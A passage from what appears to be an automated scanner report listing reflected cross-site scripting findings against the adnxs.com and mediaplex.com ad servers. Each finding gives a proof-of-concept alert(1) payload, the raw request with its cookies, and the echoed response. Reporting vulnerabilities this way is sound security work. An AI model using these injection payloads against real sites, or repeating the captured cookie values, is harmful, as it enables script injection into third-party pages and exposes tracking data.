Set-Cookie: anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH; path=/; expires=Sun, 15-May-2011 02:14:10 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 02:14:10 GMT
Content-Length: 1488

document.write('<a href="http://ib.adnxs.com/click/5zORMa3h-z97FK5H4Xr4PwAAAKCZmQFAWiBB8WPM_D9mZmZmZmYAQHC0hOKKmnRfBWHfHSmrEELBj1hNAAAAAK-aAwBlAQAAZAEAAAIAAAALtgIAPWQAAAEAAABVU0QAVVNEAKAAWAJXG-MECAkBA
...[SNIP]...
<img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=7BSW&n_cid=49470&crid=flower_vday_160x600_1999jpg&n_crid=177675&mpm=CPM&n_g=u&n_a=0&aids=7BSW-17e306';alert(1)//5bb5c06a74&n_price=1.742597&n_bust=1297649601&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-Xgraph-_-xvday1999-_-vday%26cm_mmca1%
...[SNIP]...

1.178. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca016'%3balert(1)//5fa073185f6 was submitted in the redir parameter. This input was echoed as ca016';alert(1)//5fa073185f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ptj?member=311&inv_code=cm.dailymail&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.dailymail%2Fron_052010%3Bnet%3Dcm%3Bu%3D%2Ccm-8533902_1297647301%2C11d765b6a10b1b3%2Chealth%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D572356%3Bcontx%3Dhealth%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.rdst11%3Bbtg%3Dcm.rdst12%3Bbtg%3Dcm.polit_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.shop_h%3Bbtg%3Dcm.tech_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa5%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.af1%3Bbtg%3Dmm.ai1%3Bbtg%3Dmm.al5%3Bbtg%3Dmm.am5%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.as1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dan.51%3Bbtg%3Dan.5%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dex.49%3Bbtg%3Ddx.16%3Bbtg%3Dqc.a%3Bord%3D3412338%3Fca016'%3balert(1)//5fa073185f6 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIv48BEAoYASABKAEwi43i6gQQi43i6gQYAA..; uuid2=4760492999213801733; anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIjngQChgBIAEoATCKjuLqBAoSCL-PARAKGAEgASgBMIuN4uoEEIqO4uoEGAE.; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb79863=5_[r^208WM>bcYx_nG*.:^g+C?enc=ZmZmZmZmAECE61G4HoX9PwAAAAAAAAhAhOtRuB6F_T9mZmZmZmYAQDqrGdMotboaBWHfHSmrEEIKh1hNAAAAAMs4AwA3AQAAZAEAAAIAAACILwMAploAAAEAAABVU0QAVVNEACwB-gBYDgAAUAcBAgUCAAUAAAAAqhzHbAAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+10005%2C+1297647370%29%3Buf%28%27c%27%2C+49470%2C+1297647370%29%3Buf%28%27r%27%2C+208776%2C+1297647370%29%3Bppv%289163%2C+%271926050977599302458%27%2C+1297647370%2C+1297820170%2C+49470%2C+23206%29%3B&cnd=!txQdIwi-ggMQiN8MGAAgprUBKAAxZmZmZmZmAEBCEwgAEAAYACABKP7__________wFIAFAAWNgcYABo5AI.&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5E7BSW%5ECP_ID%5E49470%5ESEG_CODES%5E7BSW-1; path=/; expires=Tue, 15-Feb-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mCZ#-r-!h!'HeE4TR!f?sYIm%X3Zp'bpV[vypRsrn$Z9K/W<P_ZTLv<7h(.63:>>Yf$^-@VYpnGhEl:Cu8vlI:i:B2V3rfi<wSZ4:l'jt8^l@>+J-D!CW=-L5P3V:*cp*s6J2Dm-cE(PSZ6)?.HX%HgNom6fYB5AqBM>35QZDs7IAdTV:i(Zen>alciVCDxC?5e0du@Tn2!mB9m/p):MJN/xr/?SGEu6U+H0tK(AOZTn)XlSDJOj2rk/[c2J<xD?g!Jz12S<Ls:>]w:Ml[DhVWJ2-P1shhC:7QXbK-0fJ4l(vmb#mn<(-w>85h!YrKc7GvAnY_M[TK-MHJ.k53yQv$*WQwj:$fp`yb3(dE==5Z#4!RNdfO'HPL9bHg$F]0Xd>Ku0zL#)BVcXlLTo3_OCCWhQ:W3Qt(h>3.z(qrY.gKwpFehGeYv!m*Q#xs(Q<ag5cC`d]p[x%e=mX)BjLqk05tsu%UmgWaNp$b:cIF+n03`_3=ASFI/MNbyctA0]?x4V-:Xzq!0'I1a'.Q/N8QTJK))xnNxMcwDX5>pKj=p]ww++74CZ1uUBI)2)rwmSf`90S(aG*0d+%d[5Qz[RKvWH?k.V%9jMiWo0QW:]S$ZP>%0m7qzHdJf3UzM-%DF/wBu=aWG>:/wu+aFbayBOlb0r+WF(LbE>MxDP9Vs<O^>[S6R!vz!=j?E$USn+; path=/; expires=Sun, 15-May-2011 01:36:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 14 Feb 2011 01:36:10 GMT
Content-Length: 1187

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.dailymail/ron_052010;net=cm;u=,cm-8533902_1297647301,11d765b6a10b1b3,health,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfa
...[SNIP]...
g=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=3412338?ca016';alert(1)//5fa073185f6">
...[SNIP]...

1.179. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90d9f"%3balert(1)//d7cf6a05065 was submitted in the mpck parameter. This input was echoed as 90d9f";alert(1)//d7cf6a05065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D572158616790d9f"%3balert(1)//d7cf6a05065&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:15 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6686
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
e=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-4?mpt=572158616790d9f";alert(1)//d7cf6a05065\" target=\"_blank\">
...[SNIP]...

1.180. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3fb5"%3balert(1)//6fd56155f2e was submitted in the mpvc parameter. This input was echoed as e3fb5";alert(1)//6fd56155f2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5"%3balert(1)//6fd56155f2e&placementid=14302119028289014& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:23 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6662
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">"
...[SNIP]...
ashVars\" VALUE=\"clickTAG=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=e3fb5";alert(1)//6fd56155f2ehttp://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&clickTag=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,7773
...[SNIP]...

1.181. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/OLE_results_band_180x150.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de4ec"%3balert(1)//371d15fe709 was submitted in the placementid parameter. This input was echoed as de4ec";alert(1)//371d15fe709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/OLE_results_band_180x150.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-4%3Fmpt%3D5721586167&mpt=5721586167&mpvc=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951513/cstr=84139146=_4d588674,5721586167,777384^951513^1183^0,1_/xsxdata=$XSXDATA/bnum=84139146/optn=64?trg=&placementid=14302119028289014de4ec"%3balert(1)//371d15fe709& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:34:25 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:53:10 GMT
ETag: "5fa04f-cd8-4987b4998e980"
Accept-Ranges: bytes
Content-Length: 6326
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289014de4ec";alert(1)//371d15fe709&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">
...[SNIP]...

1.182. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c55"%3balert(1)//4a80fa0abd1 was submitted in the mpck parameter. This input was echoed as 49c55";alert(1)//4a80fa0abd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D21007378077849c55"%3balert(1)//4a80fa0abd1&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:10 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17689
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=21007378077849c55";alert(1)//4a80fa0abd1\" target=\"_blank\">
...[SNIP]...

1.183. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba7e4"%3balert(1)//0517f93f112 was submitted in the mpvc parameter. This input was echoed as ba7e4";alert(1)//0517f93f112 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js?mpck=rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D6707832263625275206%26fcid%3D307892%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3Df65c9e8712d0a0aa12e4b294ff6547f14f38018c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D210073780778&mpt=1297647243&siteid=0&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&adid=307892&imp_id=6707832263625275206&fcid=307892&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=f65c9e8712d0a0aa12e4b294ff6547f14f38018c&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=210073780778&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%2FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAEb3SXbnARddBWHfHSmrEEKLhlhNAAAAAI9bAwBkAAAAZAAAAAIAAABwUQIAh7wAAAEAAABVU0QAVVNEALQAlgBUAAAAxgUAAgMCAAUAAAAAShEJRQAAAAA.%2Fcnd%3D%21tBF7vwj4uwIQ8KIJGAAgh_kCKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFIAFAAWFRgA2hk%2Freferrer%3Dhttp%253A%252F%252Foptimized-by.rubiconproject.com%252Fa%252Fdk.html%253Fdefaulting_ad%253Dx300f22.js%2526size_id%253D18%2526account_id%253D6005%2526site_id%253D12414%2526size%253D180x150%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000777384%252Fmnum%253D0000951470%252Fcstr%253D75633200%253D_4d58868a%252C6132271880%252C777384%255E951470%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D75633200%252Foptn%253D64%253Ftrg%253Dba7e4"%3balert(1)//0517f93f112 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:14 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 17:54:29 GMT
ETag: "4fb837-cd0-49b281b7cbf40"
Accept-Ranges: bytes
Content-Length: 17665
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";
var ckp = "http://img-cdn.mediaplex.com/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.jpg";
ckp = ckp.replace(/.*\/.*\/([0-9]*)_(
...[SNIP]...
dvertising.com%2Fclick%2Fsite%3D0000777384%2Fmnum%3D0000951470%2Fcstr%3D75633200%3D_4d58868a%2C6132271880%2C777384%5E951470%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D75633200%2Foptn%3D64%3Ftrg%3Dba7e4";alert(1)//0517f93f112http://rover.ebay.com%2Frover%2F1%2F711-118167-2042-2%2F4%3Fmpt%3D1297647243%26siteid%3D0%26Perf_Tracker_1%3D0000777384%26Perf_Tracker_2%3D0000951470%26Perf_Tracker_3%3D1183%26adid%3D307892%26imp_id%3D
...[SNIP]...

1.184. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd5"><script>alert(1)</script>c7aa141f23a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

